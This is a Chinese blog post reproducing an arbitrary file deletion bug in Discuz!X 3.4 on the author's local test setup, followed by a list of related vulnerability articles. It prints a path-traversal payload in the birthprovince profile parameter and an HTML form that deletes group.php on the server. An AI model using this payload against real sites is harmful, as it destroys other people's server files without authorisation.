Discuz!X 前台任意文件删除漏洞复现测试

最新推荐文章于 2023-10-05 11:43:37 发布
最新推荐文章于 2023-10-05 11:43:37 发布
阅读量4.4k 收藏
点赞数
分类专栏: web安全 文章标签: discuz任意文件删除
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1124794084/article/details/78143718
版权

今天看到一个Discuz!X 前台任意文件删除漏洞。

自己本机搭建环境进行测试

环境搭建我用的是Discuz 3.4版本的。phpstudy 

环境搭建完毕后,注册一个账号。

到达个人信息修改页面。


拦截数据包,修改birthprovince参数为文件站点存在的文件。。比如我要测试删除这个group.php文件。


发送包以后我们还要构造请求去执行删除的文件。

请求 home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../group.php&profilesubmit=1&formhash=3123Cv
其中 formhash 为用户 hash


然后写一个执行改服务器的html表单。如下

<form
action="http://你的服务器IP/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi
nce]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="f6a1381a"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
保存为test.html



提交表单,upload目录下的group.php文件就被删除了。

黑面狐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Discuz! X3.3 正式版 简体中文 GBK 20170701
12-30
Discuz! X3.3 在继承和完善 Discuz! X3.2 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为提供更加可靠的保障。
Discuz! X3.3 正式版 简体中文 UTF8 20170701
11-29
Discuz! X3.3 在继承和完善 Discuz! X3.2 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为提供更加可靠的保障。
Discuz任意文件删除
qq_51459600的博客
04-01 3794
文章目录Discuz任意文件删除实验环境漏洞复现 Discuz任意文件删除 实验环境 官方于2017年9月28日对源码进行了修复,这里验证的版本为Discuz3.2: Discuz3.2下载地址: https://download.comsenz.com/DiscuzX/3.2/Discuz_X3.2_SC_UTF8.zip 服务器:Windiws Server 2008 SP2(10.10.10.142) 攻击机:物理机(10.10.10.1) 环境搭建好后开始安装DZ 漏洞复现 在服务器DZ根目录
discuz 论坛提速之删除data/log下的xxx.php文件
一颗优雅草科技-央千澈的CSDN博客~只想无穷无尽的学习~
06-30 341
discuz 论坛提速之删除data/log 可能很多人不知道这个log下面一看全是.php文件是不是应该不能删除,其实这些文件全是日志文件。 而且log目录下最容易被植入木马,这样会使得论坛访问极其慢。
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 3431
Discuz v3.4系列 远程代码执行漏洞全流程详解
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 3935
Discuz!X全版本存在SQL注入漏洞漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
任意文件读取及删除漏洞
qq_50854662的博客
09-27 2029
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,...
PHP代码审计 ----- 任意文件读取 & 删除漏洞
qq_62344745的博客
04-19 747
通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
Discuz X 3.4 系列漏洞梳理
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
Discuz! X3.4 繁体中文-PHP
06-20
X3.4 在继承和完善 Discuz! X3.3 的基础上,去除了云平台的相关代码,其他功能保持不变,如果您的论坛不需要云平台可以选择安装或更新到此版本。主要更新功能为:1、完善视频解析播放2、HTTPS兼容性优化3、修复各类...
Discuz_7.0.0 免費論壇
06-19
Discuz_7.0.0 免費論壇 輕松擁有自己的論壇 Discuz_7.0.0 免費論壇 Discuz_7.0.0 免費論壇
Discuz! X3.4 正式版 简体中文 UTF8 20191201
08-22
Discuz! X3.3 在继承和完善 Discuz! X3.2 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为提供更加可靠的保障。
社区论坛程序 Discuz! X3.4 简体中文 GBK 正式版
11-29
Discuz! X3.3 在继承和完善 Discuz! X3.2 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为提供更加可靠的保障。
漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723
10-14 1014
discuz-wooyun-命令执行】Cookie中命令执行
Discuz漏洞复现
小小猪的博客
11-30 5252
Discuz漏洞复现 漏洞描述: Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。 漏洞影响版本: Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org (注意:支持多语言切换可能会有这个漏洞!) 环境搭建: 这里用安鸾渗透测试实战平台环境 :地址 这里访问robots.txt,发现下面有很多路径,访问之
Discuz!X 3.4任意文件删除漏洞
最新发布
众生度尽,方证菩提
10-05 574
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 942
Discuz v3.1系列版本 Sql注入全流程详解
DiscuzX ≤3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2731
Discuz!X ≤3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞复现 1.安装数据库 2.查看robots文件,发现文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
discuz! x3.4 文库网站模板
09-03
discuz! X3.4 文库网站模板是一个基于discuz! X3.4论坛系统开发的专门用于搭建文库类网站的模板。它提供了丰富的功能和设计,使用户可以方便地创建和管理属于自己的文库网站。 首先,discuz! X3.4 文库网站模板具有强大的文库管理功能。用户可以通过该模板实现文档的上传、编辑、分类和检索等操作。不仅如此,还可以设置文库的权限和审核机制,保证文库内容的品质和安全。 其次,该模板具有友好的用户体验和界面设计。用户可以轻松浏览和搜索文库中的文档,以及与其他用户进行交流和讨论。同时,该模板支持多种文档格式的预览和下载,方便用户查阅所需的资料。 此外,该模板还提供了灵活的扩展功能。用户可以根据自己的需求,通过discuz! X3.4的插件机制,添加各类功能模块和扩展,以实现更多定制化的需求。比如,可以添加评论功能、点赞功能、收藏功能等,提升用户的参与度和使用体验。 总而言之,discuz! X3.4 文库网站模板是一个专业、功能齐全的文库网站建设工具。无论是个人用户还是企业机构,都可以通过该模板快速搭建自己的文库网站,提供优质的文档资源和交流平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值